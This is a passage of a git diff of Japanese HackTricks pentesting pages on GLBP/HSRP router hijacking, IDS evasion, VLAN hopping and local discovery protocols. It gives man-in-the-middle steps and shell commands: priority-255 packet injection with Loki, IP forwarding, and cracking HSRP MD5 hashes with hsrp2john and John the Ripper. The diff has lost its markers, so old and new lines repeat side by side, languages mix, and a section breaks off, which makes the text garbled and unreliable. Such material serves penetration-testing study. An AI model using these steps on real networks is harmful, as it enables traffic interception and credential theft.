Cisco の創造物である GLBP は、TCP/IPスタック上で機能し、通信にはポート3222でUDPを利用します。GLBP グループ内のルーターは、3秒ごとに "hello" パケットを交換します。ルーターがこれらのパケットを10秒間送信しない場合、オフラインと見なされます。ただし、これらのタイマーは固定されておらず、変更可能です。
### GLBPの動作と負荷分散
GLBPは、1つの仮想IPとさまざまな仮想MACアドレスを使用して、複数のルーター間で負荷を共有できます。グループ内のすべてのルーターがパケットの転送に参加します。GLBPは、次のような真の負荷分散を提供することで、HSRP/VRRPとは異なります
### GLBP の動作と負荷分散
GLBP は、単一の仮想IPと複数の仮想MACアドレスを使用して、ルーター間で負荷分散を可能にすることで際立っています。GLBP グループでは、すべてのルーターがパケットの転送に関与します。HSRP/VRRP とは異なり、GLBP は次のメカニズムを通じて本物の負荷分散を提供します:
- **ホスト依存:** ホストが同じAVF MACアドレスを受信し、NAT構成が保持されることを保証します。
- **ラウンドロビン:** AVF MACアドレスが交互に配布されるデフォルトモードです
- **重みベースのラウンドロビン:** 事前に定義された「重み」メトリックに基づいて負荷をバランスします。
- **ホスト依存型負荷分散:** ホストに一貫したAVF MACアドレスを割り当て、安定したNAT構成に不可欠です。
- **ラウンドロビン負荷分散:** リクエストするホスト間でAVF MACアドレスの割り当てを交互に行うデフォルトのアプローチ
- **重み付きラウンドロビン負荷分散:** 事前に定義された "重み" メトリクスに基づいて負荷を分散します。
### GLBPドメインの役割と用語
- **AVGActive Virtual Gateway:** 他のルーターにMACアドレスを配布する主要なルーターです
- **AVFActive Virtual Forwarder:** ネットワークトラフィックを処理するルーターです
- **GLBP優先度:** AVGを決定し、デフォルトは100で、1から255までの範囲があります。
- **GLBP重み:** ルーターの負荷レベルを示し、手動で調整するか、オブジェクトトラッキングを介して調整できます。
- **GLBP仮想IPアドレス:** 接続されたデバイスのデフォルトゲートウェイとして機能します。
### GLBP における主要なコンポーネントと用語
- **AVGActive Virtual Gateway:** MACアドレスをピアルーターに割り当てる責任を持つメインルーター
- **AVFActive Virtual Forwarder:** ネットワークトラフィックを管理するために指定されたルーター
- **GLBP 優先度:** AVG を決定するメトリクスで、デフォルトで100から255の範囲で開始します。
- **GLBP 重み:** ルーター上の現在の負荷を反映し、手動で調整するか、Object Tracking を介して調整できます。
- **GLBP 仮想IPアドレス:** 接続されたすべてのデバイスのデフォルトゲートウェイとして機能します。
GLBPは、予約されたマルチキャストアドレス224.0.0.102とUDPポート3222を使用して通信します。3秒ごとに「hello」パケットが送信され、パケットが10秒以内に受信されない場合、ルーターは「dead」とマークされます。
GLBPは、予約されたマルチキャストアドレス224.0.0.102 と UDP ポート3222 を使用して相互作用します。ルーターは3秒ごとに "hello" パケットを送信し、パケットが10秒間欠落した場合は非稼働と見なされます。
### GLBP攻撃メカニズム
攻撃者は、最も高い優先度値255を持つGLBPパケットを送信することで、主要ルーターになることができます。これにより、DoSやMITM攻撃が可能となり、トラフィックの傍受やリダイレクトが可能となります。
### GLBP 攻撃メカニズム
攻撃者は、最も高い優先度値255を持つGLBPパケットを送信することで、主要ルーターになることができます。これにより、DoSやMITM攻撃が発生し、トラフィックの傍受やリダイレクトが可能になります。
### Lokiを使用したGLBP攻撃の実行
[Loki](https://github.com/raizo62/loki_on_kali)は、優先度と重みが255に設定されたパケットを注入することでGLBP攻撃を実行できます。攻撃前の手順には、Wiresharkなどのツールを使用して、仮想IPアドレス、認証の有無、およびルーターの優先度値などの情報を収集することが含まれます。
### Loki を使用した GLBP 攻撃の実行
[Loki](https://github.com/raizo62/loki_on_kali) は、優先度と重みが255に設定されたパケットを注入することで GLBP 攻撃を実行できます。攻撃前の手順には、Wiresharkなどのツールを使用して、仮想IPアドレス、認証の有無、およびルーターの優先度値などの情報を収集することが含まれます。
攻撃手順
攻撃手順:
1. プロミスキャスモードに切り替えてIPフォワーディングを有効にします。
2. ターゲットルーターを特定し、そのIPを取得します。
3. Gratuitous ARPを生成します。
4. AVGをなりすまして悪意のあるGLBPパケットを注入します。
5. 攻撃者のネットワークインターフェースにセカンダリIPアドレスを割り当て、GLBP仮想IPを反映させます。
6. 完全なトラフィックの可視性のためにSNATを実装します。
7. インターネットアクセスを元のAVGルーターを介して継続するようにルーティングを調整します。
3. Gratuitous ARP を生成します。
4. AVG をなりすまして悪意のあるGLBPパケットを注入します。
5. 攻撃者のネットワークインターフェースにセカンダリIPアドレスを割り当て、GLBP 仮想IPを反映させます。
6. 完全なトラフィックの可視性のためにSNAT を実装します。
7. インターネットアクセスを元の AVG ルーターを介して継続するようにルーティングを調整します。
これらの手順に従うことで、攻撃者は自分自身を「中間者」として配置し、暗号化されていないまたは機密性の高いデータを含むネットワークトラフィックを傍受および分析できます。
これらの手順に従うことで、攻撃者は自分自身を "man in the middle" として配置し、暗号化されていないまたは機密性の高いデータを含むネットワークトラフィックを傍受および分析することができます。
デモンストレーションのために、必要なコマンドスニペットを以下に示します
デモンストレーションのために、必要なコマンドスニペットを以下に示します:
```bash
# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
@ -73,12 +73,12 @@ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
### HSRPハイジャックのパッシブな説明とコマンドの詳細
#### HSRPHot Standby Router/Redundancy Protocolの概要
HSRPは、ネットワークゲートウェイの冗長性のために設計されたCisco独自のプロトコルです。複数の物理ルータを1つの論理ユニットに構成し、共有IPアドレスを持ことができます。この論理ユニットは、トラフィックを管理するための責任を持つプライマリルータによって管理されます。GLBPが優先度や重みなどのメトリクスを使用して負荷分散を行うのに対し、HSRPはトラフィック管理のために単一のアクティブルータを使用します。
HSRPは、ネットワークゲートウェイの冗長性のために設計されたCisco独自のプロトコルです。複数の物理ルータを1つの論理ユニットに構成し、共有IPアドレスを持たせることができます。この論理ユニットは、トラフィックを管理するための責任を持つプライマリルータによって管理されます。GLBPが優先度や重みなどのメトリクスを使用して負荷分散を行うのに対し、HSRPはトラフィック管理に単一のアクティブルータを使用します。
#### HSRPの役割と用語
- **HSRPアクティブルータ**: トラフィックフローを管理するゲートウェイとして機能するデバイス。
- **HSRPスタンバイルータ**: アクティブルータが故障した場合に引き継ぐ準備ができたバックアップルータ。
- **HSRPグループ**: 単一の強な仮想ルータを形成するために協力するルータのセット。
- **HSRPグループ**: 単一の強な仮想ルータを形成するために協力するルータのセット。
- **HSRP MACアドレス**: HSRPセットアップ内の論理ルータに割り当てられた仮想MACアドレス。
- **HSRP仮想IPアドレス**: 接続されたデバイスのデフォルトゲートウェイとして機能するHSRPグループの仮想IPアドレス。
@ -86,7 +86,7 @@ HSRPは、ネットワークゲートウェイの冗長性のために設計さ
HSRPには、HSRPv1とHSRPv2の2つのバージョンがあり、主にグループ容量、マルチキャストIPの使用、および仮想MACアドレス構造が異なります。プロトコルは、サービス情報の交換に特定のマルチキャストIPアドレスを使用し、Helloパケットは3秒ごとに送信されます。パケットが10秒間受信されない場合、ルータは非アクティブと見なされます。
#### HSRP攻撃メカニズム
HSRP攻撃は、最大優先度値を注入してアクティブルータの役割を強制的に引き継ぐことを含みます。これにより、中間者攻撃MITMが発生する可能性があります。攻撃前の重要なステップには、HSRPセットアップに関するデータを収集することが含まれ、Wiresharkを使用してトラフィックを分析することができます。
HSRP攻撃は、最大優先度値を注入することでアクティブルータの役割を強制的に引き継ぐことを含みます。これにより、中間者攻撃MITMが発生する可能性があります。攻撃前の重要なステップには、HSRPセットアップに関するデータを収集することが含まれ、これはトラフィック分析のためにWiresharkを使用して行うことができます。
#### HSRP認証のバイパス手順
1. HSRPデータを含むネットワークトラフィックを.pcapファイルとして保存します。
@ -97,7 +97,7 @@ tcpdump -w hsrp_traffic.pcap
```shell
python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
```
3. John the Ripperを使用してMD5ハッシュをクラックします。
3. John the Ripperを使用してMD5ハッシュを解読します。
```shell
john --wordlist=mywordlist.txt hsrp_hashes
```
@ -110,7 +110,7 @@ john --wordlist=mywordlist.txt hsrp_hashes
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1
```
3. Lokiを使用して特定のルータをターゲットにし、クラックされたHSRPパスワードを入力し、アクティブルータを偽装するために必要な設定を行います。
3. Lokiを使用して特定のルータをターゲットにし、解読されたHSRPパスワードを入力し、アクティブルータを偽装するために必要な設定を行います。
4. アクティブルータの役割を取得した後、ネットワークインターフェースとIPテーブルを設定して正当なトラフィックを傍受します。
```shell
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0

36
generic-methodologies-and-resources/pentesting-network/ids-evasion.md
View file

@ -4,18 +4,18 @@
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で私たちをフォローする [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するには、** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* 独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で**@hacktricks_live**をフォローする🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **ハッキングトリックを共有するためにPRを送信して** [**HackTricks**](https://github.com/carlospolop/hacktricks) および [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリに参加する
</details>
# **TTL操作**
IDS/IPSに到達するだけのTTLを持つパケットをいくつか送信し、最終システムに到達するには十分でないTTLを持つ別のパケットを送信します。そして、他のパケットと同じシーケンスで別のパケットを送信すると、IPS/IDSはそれらが繰り返しであると思い込み、チェックを行いませんが、実際には悪意のあるコンテンツを運んでいます。
IDS/IPSに到達するだけのTTLを持つパケットをいくつか送信し、最終システムに到達するには十分でないTTLを持つ別のパケットを送信します。その後、他のパケットと同じシーケンスで別のパケットを送信すると、IPS/IDSはそれらを繰り返しと考え、チェックしないでしょうが、実際には悪意のあるコンテンツを運んでいます。
**Nmapオプション:** `--ttlvalue <value>`
@ -27,29 +27,29 @@ IDS/IPSに到達するだけのTTLを持つパケットをいくつか送信し
# **フラグメント化されたパケット**
パケットをフラグメント化して送信するだけです。IDS/IPSがそれらを再結合する能力を持っていない場合、それらは最終ホストに到達します。
パケットをフラグメント化して送信するだけです。IDS/IPSがそれらを再組み立てる能力を持っていない場合、それらは最終ホストに到達します。
**Nmapオプション:** `-f`
# **無効な** _**チェックサム**_
通常、センサーはパフォーマンス上の理由からチェックサムを計算しません。したがって、攻撃者はセンサーによって解釈されるが最終ホストによって拒否されるパケットを送信できます。例:
通常、センサーはパフォーマンス上の理由からチェックサムを計算しません。したがって、攻撃者はセンサーが解釈するが最終ホストには拒否されるパケットを送信できます。例:
RSTフラグと無効なチェックサムを持つパケットを送信し、IPS/IDSはこのパケットが接続を閉じるために送信されると思うかもしれませんが、最終ホストはチェックサムが無効であるためパケットを破棄します。
RSTフラグと無効なチェックサムを持つパケットを送信し、IPS/IDSはこのパケットが接続を閉じると思うかもしれませんが、最終ホストはチェックサムが無効であるためパケットを破棄します。
# **一般的でないIPおよびTCPオプション**
センサーは、IPおよびTCPヘッダー内で特定のフラグとオプションが設定されたパケットを無視する場合がありますが、宛先ホストは受信後にパケットを受け入れます
センサーは、IPおよびTCPヘッダー内で特定のフラグとオプションが設定されたパケットを無視するかもしれませんが、宛先ホストは受信後にパケットを受け入れるかもしれません
# **オーバーラップ**
パケットをフラグメント化すると、パケット間にオーバーラップが存在する可能性がありますたとえば、パケット1の最初の8バイトがパケット2の最後の8バイトとオーバーラップし、パケット2の最後の8バイトがパケット3の最初の8バイトとオーバーラップする場合があります。その後、IDS/IPSがそれらを最終ホストと異なる方法で再組み立てる場合、異なるパケットが解釈される可能性があります。\
パケットをフラグメント化すると、パケット間にオーバーラップが存在する可能性がありますたとえば、パケット1の最初の8バイトがパケット2の最後の8バイトとオーバーラップし、パケット2の最後の8バイトがパケット3の最初の8バイトとオーバーラップする場合があります。その後、IDS/IPSがそれらを最終ホストと異なる方法で再組み立てる場合、異なるパケットが解釈される可能性があります。\
または、同じオフセットを持つ2つのパケットが来て、ホストはどちらを取るかを決定する必要があります。
* **BSD**: より小さい _offset_ を持つパケットを優先します。同じオフセットを持つパケットの場合、最初のパケットを選択します。
* **Linux**: BSDと同様ですが、同じオフセットを持つ最後のパケットを優先します。
* **First** (Windows): 来た値が残る
* **Last** (cisco): 来た値が残る
* **First** (Windows): 来た値が残る。
* **Last** (cisco): 来た最後の値が残る。
# ツール
@ -62,10 +62,10 @@ RSTフラグと無効なチェックサムを持つパケットを送信し、IP
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で私たちをフォローする [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するには、** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* 独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で**@hacktricks_live**をフォローする🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **ハッキングトリックを共有するためにPRを送信して** [**HackTricks**](https://github.com/carlospolop/hacktricks) および [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリに参加する
</details>

101
generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md
View file

@ -4,65 +4,84 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いていますか?**HackTricksで会社の広告を掲載**したいですか?または、**最新版のPEASSを入手**したり、**HackTricksをPDFでダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションです。
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**に**フォローしてください。**
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、ハッキングのコツを共有してください。**
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>
スイッチへの直接アクセスが可能な場合、VLANセグメンテーションをバイパスすることができます。これには、接続されたポートをトランクモードに再設定し、対象VLANの仮想インターフェースを確立し、シナリオに応じて動的DHCPまたは静的にIPアドレスを設定することが含まれます詳細についてはhttps://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9をチェックしてください
スイッチへの直接アクセスが可能な場合、VLANセグメンテーションをバイパスできます。これには、接続されたポートをトランクモードに再構成し、ターゲットVLAN用の仮想インターフェースを確立し、IPアドレスを動的にDHCPまたは静的に設定する必要があります。シナリオに応じて**詳細については[https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)を参照してください)**
初めに、特定の接続ポートを識別する必要があります。これは通常、CDPメッセージを通じて、または**include**マスクを使用してポートを検索することで達成できます。
まず、特定の接続ポートの識別が必要です。これは通常、CDPメッセージを介して行うか、**include**マスクを使用してポートを検索することで達成できます。
**CDPが動作していない場合、MACアドレスを検索することによってポート識別を試みることができます**
**CDPが動作していない場合、MACアドレスを検索してポートを特定できます**:
```
SW1(config)# show mac address-table | include 0050.0000.0500
```
既存のVLANのリストを作成し、それらの識別子を決定することが、トランクモードに切り替える前に行うべきです。これらの識別子はインターフェースに割り当てられ、トランクを通じて様々なVLANへのアクセスを可能にします。例えば、使用中のポートはVLAN 10に関連付けられています。
事前にトランクモードに切り替える前に、既存のVLANのリストを作成し、その識別子を特定する必要があります。 これらの識別子は、インターフェイスに割り当てられ、トランクを介してさまざまなVLANにアクセスできるようになります。 たとえば、使用中のポートはVLAN 10に関連付けられています。
```
SW1# show vlan brief
```
**トランクモードへの移行にはインターフェース設定モードへの入力が必要です**
**トランクモードへの移行は、インターフェース構成モードに入ることを意味します**:
```
SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk
```
```markdown
トランクモードへの切り替えは一時的に接続を中断しますが、その後で接続は回復できます。
スイッチをトランクモードに切り替えると、一時的に接続が中断されますが、その後に復元できます。
仮想インターフェースを作成し、VLAN IDを割り当て、そして有効化します
仮想インターフェースが作成され、VLAN IDが割り当てられ、アクティブ化されます
```bash
sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
sudo vconfig add eth0 60
sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up
```
その後、DHCPを介してアドレスリクエストが行われます。DHCPが適用できない場合は、アドレスを手動で設定することもできます。
```bash
sudo dhclient -v eth0.10
sudo dhclient -v eth0.20
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60
```
~$ sudo vconfig add eth0 10
~$ sudo vconfig add eth0 20
~$ sudo vconfig add eth0 50
~$ sudo vconfig add eth0 60
~$ sudo ifconfig eth0.10 up
~$ sudo ifconfig eth0.20 up
~$ sudo ifconfig eth0.50 up
~$ sudo ifconfig eth0.60 up
```plaintext
1. Open a terminal window.
2. Use the following command to list available network interfaces:
```
ip a
```
3. Identify the interface associated with VLAN 10 (e.g., eth0.10).
4. Use the following command to set a static IP address for the identified interface (replace IP_ADDRESS and NETMASK with the desired values):
```
sudo ip addr add IP_ADDRESS/NETMASK dev INTERFACE_NAME
```
Example:
```
sudo ip addr add 192.168.1.100/24 dev eth0.10
```
5. Verify the changes by running the following command:
```
ip a show INTERFACE_NAME
```
Example:
```
ip a show eth0.10
```
```
その後、DHCPを介してアドレス要求が行われます。DHCPが実行不可能な場合には、アドレスを手動で設定することもできます
```bash
sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
```
~$ sudo dhclient -v eth0.10
~$ sudo dhclient -v eth0.20
~$ sudo dhclient -v eth0.50
~$ sudo dhclient -v eth0.60
```
```
インターフェースに静的IPアドレスを手動で設定するVLAN 10
```
```
~$ sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
```
VLAN 10, 20, 50, および 60 のデフォルトゲートウェイに ICMP リクエストを開始することで接続性がテストされます。
Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60.
最終的に、このプロセスにより VLAN セグメンテーションのバイパスが可能になり、任意の VLAN ネットワークへの制限なしのアクセスを容易にし、後続のアクションのための舞台を整えます。
Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions.
# 参考文献
# References
* [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
@ -70,10 +89,10 @@ VLAN 10, 20, 50, および 60 のデフォルトゲートウェイに ICMP リ
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社の広告を掲載**したいですか?または、**最新版の PEASS を入手**したり、**HackTricks を PDF でダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください。
* [**公式の PEASS & HackTricks グッズ**](https://peass.creator-spring.com)を手に入れましょう。
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord グループ**](https://discord.gg/hRep4RUj7f)や [**telegram グループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**にフォローしてください。**
* **[hacktricks リポジトリ](https://github.com/carlospolop/hacktricks)や [hacktricks-cloud リポジトリ](https://github.com/carlospolop/hacktricks-cloud)に PR を提出して、あなたのハッキングのコツを共有してください。**
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

133
generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md
View file

@ -4,8 +4,8 @@
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
* **HackTricks**https://github.com/carlospolop/hacktricksと[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
@ -13,112 +13,49 @@ HackTricksをサポートする他の方法
</details>
# マルチキャストDNSmDNS
## マルチキャストDNSmDNS
**マルチキャストDNS****mDNS**プロトコルは、ローカルネームサーバーを持たない小規模ネットワーク内でホスト名をIPアドレスに解決します。
**mDNS**プロトコルは、専用の名前サーバーなしで小規模なローカルネットワーク内のIPアドレス解決を目的として設計されています。指定された名前を持つホストにIPアドレスを返信するよう促すために、サブネット内でクエリをマルチキャストで実行します。その後、サブネット内のすべてのデバイスはこの情報を使用してmDNSキャッシュを更新できます。
mDNSクライアントがホスト名を解決する必要がある場合、その名前を持つホストに自己識別を要求するIpマルチキャストクエリメッセージを送信します。そのターゲットマシンは、自身のIPアドレスを含むメッセージをマルチキャストします。そのサブネット内のすべてのマシンは、その情報を使用して自身のmDNSキャッシュを更新できます。
注意すべき重要なポイント:
- **ドメイン名の放棄**ホストはTTLがゼロのパケットを送信することで、ドメイン名を解放できます。
- **使用制限**mDNSは通常、**.local**で終わる名前の解決のみを行います。このドメイン内の非mDNSホストとの競合には、ネットワーク構成の調整が必要です。
- **ネットワーキングの詳細**
- イーサネットマルチキャストMACアドレスIPv4 - `01:00:5E:00:00:FB`、IPv6 - `33:33:00:00:00:FB`
- IPアドレスIPv4 - `224.0.0.251`、IPv6 - `ff02::fb`
- UDPポート5353上で動作します。
- mDNSクエリはローカルネットワークに制限され、ルーターを越えることはありません。
任意のホストは、TTLTime To Liveがゼロに等しい応答パケットを送信することで、ドメイン名への権利を放棄できます。
## DNS-SDサービスディスカバリ
デフォルトでは、mDNSは**.local**トップレベルドメインTLDで終わるホスト名のみを解決します。これは、そのドメインにmDNSを実装していないが従来のユニキャストDNSサーバーを介して見つけることができるホストが含まれている場合に問題を引き起こす可能性があります。このような競合を解決するには、ネットワーク構成の変更が必要です。
DNS-SDは、特定のドメイン名`_printers._tcp.local`)をクエリしてネットワーク上のサービスを検出するためのプロトコルです。応答には、この場合は利用可能なプリンターなど、関連するすべてのドメインが含まれます。サービスタイプの包括的なリストは[こちら](http://www.dns-sd.org/ServiceTypes.html)で見つけることができます。
* イーサネットフレームを使用する場合、標準のマルチキャストMACアドレスはIPv4の _01:00:5E:00:00:FB_ またはIPv6の _33:33:00:00:00:FB_ です。
* IPv4アドレス _224.0.0.251_ またはIPv6アドレス _ff02::fb_
* UDPポート5353。
## SSDPシンプルサービスディスカバリプロトコル
mDNSクエリはルータを通過しませんイーサネット内でブロードキャストされます
SSDPはネットワークサービスの検出を容易にするプロトコルであり、主にUPnPによって利用されます。UDPを使用したテキストベースのプロトコルで、マルチキャストアドレッシングを使用します。IPv4の場合、指定されたマルチキャストアドレスは`239.255.255.250`です。SSDPの基盤は[HTTPU](https://en.wikipedia.org/wiki/HTTPU)であり、UDP向けのHTTPの拡張です。
# DNS-SDサービスディスカバリ
## デバイス向けWebサービスWSD
ネットワークに接続されたデバイスは、Webサービスを介して利用可能なサービスプリンターなどを特定できます。これにはUDPパケットのブロードキャストが含まれます。サービスを求めるデバイスはリクエストを送信し、サービスプロバイダーは自分の提供物をアナウンスします。
このプロトコルはネットワーク内のホストを発見するために使用できます。特定のドメイン名(例: _\_printers\_tcp.local_\)をリクエストし、その名前に関連するすべてのドメインが応答します(この場合、プリンター) 。この特別な名前の完全なリストは[こちら](http://www.dns-sd.org/ServiceTypes.html)で見つけることができます。
## OAuth 2.0
